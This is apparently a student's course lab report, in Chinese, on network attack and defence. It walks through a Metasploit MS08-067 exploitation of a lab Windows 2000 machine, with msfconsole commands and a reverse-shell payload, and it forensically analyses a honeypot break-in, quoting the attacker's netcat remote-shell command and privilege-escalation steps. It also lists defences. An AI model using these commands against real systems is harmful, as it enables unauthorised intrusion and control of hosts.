20232802黄千里 2023-2024-2 《网络攻防实践》实践六报告

20232802黄千里

已于 2024-06-29 22:42:16 修改

阅读量627

点赞数 23

文章标签：网络

于 2024-04-18 23:55:13 首次发布

本文链接：https://blog.csdn.net/Alex_hql/article/details/137932900

版权

20232802 2023-2024-2 《网络攻防实践》实践六报告

一、实践过程

1.动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权。

1）在 Kali 攻击机终端使用以下命令进入 Metasploit：
sudo apt-get install metasploit-framework
msfconsole
在这里插入图片描述
输入use exploit/windows/smb/ms08_067_netapi使用相关攻击脚本，使用show payloads显示可用的攻击负载，set payload generic/shell_reverse_tcp选择你要用的攻击负载模块：

使用show options查看需要设置的参数:

使用set RHOST 192.168.200.124设置靶机为win2k，set LHOST 192.168.200.2设置攻击机为kali，再输入exploit开始攻击。攻击成功之后输入若干命令进行测试：
在这里插入图片描述
可以使用Wireshark捕获攻击过程产生的数据包：

2.取证分析实践：解码一次成功的NT系统破解攻击

[来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
1、攻击者使用了什么破解工具进行攻击
2、攻击者如何使用这个破解工具进入并控制了系统
3、攻击者获得系统访问权限后做了什么
4、我们如何防止这样的攻击
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么]
使用wireshark打开snort-0204@0117.log文件，大致浏览文件后，可以发现日志文件由以下内容组成：

可识别的HTTP协议内容
可识别的SQL语言代码内容
可识别的系统操作代码内容
不可识别的数据（二进制数据）

(1)攻击者使用了什么破解工具进行攻击

攻击者利用了Unicode攻击（针对MS00-078/MS01-026）和针对msadcs.dll中RDS漏洞（MS02-065）的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
分析：
追踪HTTP数据流，找到特殊字符%C0%AF，在Unicode编码中对应符号/，因此可以推测存在UNICODE编码漏洞攻击，说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况：
在这里插入图片描述

再往下，可以看到攻击者试图向服务器获取一个msadcs.dll文件：

攻击者利用这个dll存在RDS漏洞，输入了个数据查询语句进行SQL注入攻击。根据“ADM!ROX!YOUR!WORLD”特征字符串，以及查询语句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb，通过查询可以知道到它是由rain forest puppy 编写的 msadc(2).pl渗透攻击代码发起的
在这里插入图片描述
至此，攻击者通过查点确认了目标系统提供 Web 服务的是IIS v4.0，并存在Unicode和RDS安全漏洞，可进行进一步渗透攻击。

(2)攻击者如何使用这个破解工具进入并控制了系统

观察到每次 RDS 渗透攻击间的间隔时间均为 6秒左右，可以推测攻击者是预先写好需执行的 shell 指令列表，然后由 msadc(2).pl 渗透攻击工具一起执行。可以发现攻击者并没有成功，之后便又开始转向 Unicode 攻击，每条请求间隔时间大概在 10-12 秒，意味着指令可能是由攻击者手工输入的。
攻击者就成功进入了系统之后，继续往下看，可以发现攻击者建立了一个ftp连接，但是可以看到请求间隔时间大概在 10-12 秒，意味着这些指令可能是由攻击者手工输入的，而且输入了多次才输入正确。
在这里插入图片描述
蜜罐主机连接 213.116.251.162 并下载了所指定的这些文件，并通过 nc构建其一个远程 shell 通道。cmd1.exe /c nc -l -p 6969 -e cmd1.exe接着，攻击者连接 6969 端口，获得了访问权，并进入了交互式控制阶段

（3）攻击者获得系统访问权限后做了什么

从下图的tcp流可以看到攻击者的行为：
在这里插入图片描述
对目标主机的文件系统进行了嗅探并删除了一些文件：

并试图通过删除SAM数据库中的数据（拷贝和删除har.txt）和将自己加到管理员组中的方式来实现提升自己访问权限的目的

（4）我们如何防止这样的攻击

这个攻击事件中被利用的两个漏洞为RDS和Unicode漏洞，两者都已经有相应的补丁，通过打补丁可防止遭受同样的攻击。不要使用 IIS4.x 这样臭名昭著的 Web Server，如果必须使用 IIS4.x，主要的防范措施有:

为这些漏洞打上补丁，
禁用用不着的 RDS 等服务，
防火墙封禁网络内部服务器发起的连接
为 web server 在单独的文件卷上设置虚拟根目录
使用 NTFS 文件系统，因为 FAT 几乎不提供安全功能
使用 IIS Lockdown 和 URLScan 等工具加强 web serve

（5）你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

攻击者意识到了攻击目标是蜜罐主机，因为他建立了一个文件，并输入了如下内容 C:>echo best honeypot i’ve seen till now 😃 > rfp.txt
在这里插入图片描述
因为该目标主机作为 rfp 的个人网站， Web 服务所使用的 IIS 甚至没有更新 rfp 自己所发现的 MDAC RDS安全漏洞，很容易让攻击者意识到这绝对是台诱饵

3.团队对抗实践：windows系统远程渗透攻击和分析

1.攻击实践：
实践环境：
攻击机Kali：192.168.85.193（20232802黄千里）
靶机Win2k：192.168.85.62（20232801刘莹）

依照任务一步骤，进行攻击
在这里插入图片描述

创建文件hql，在同伴的win2k虚拟机192.168.85.62（20232801刘莹）创建结果如下

2.靶机实践：
实践环境：
攻击机Kali：192.168.85.223（20232801刘莹）
靶机Win2k：192.168.85.53（20232802黄千里）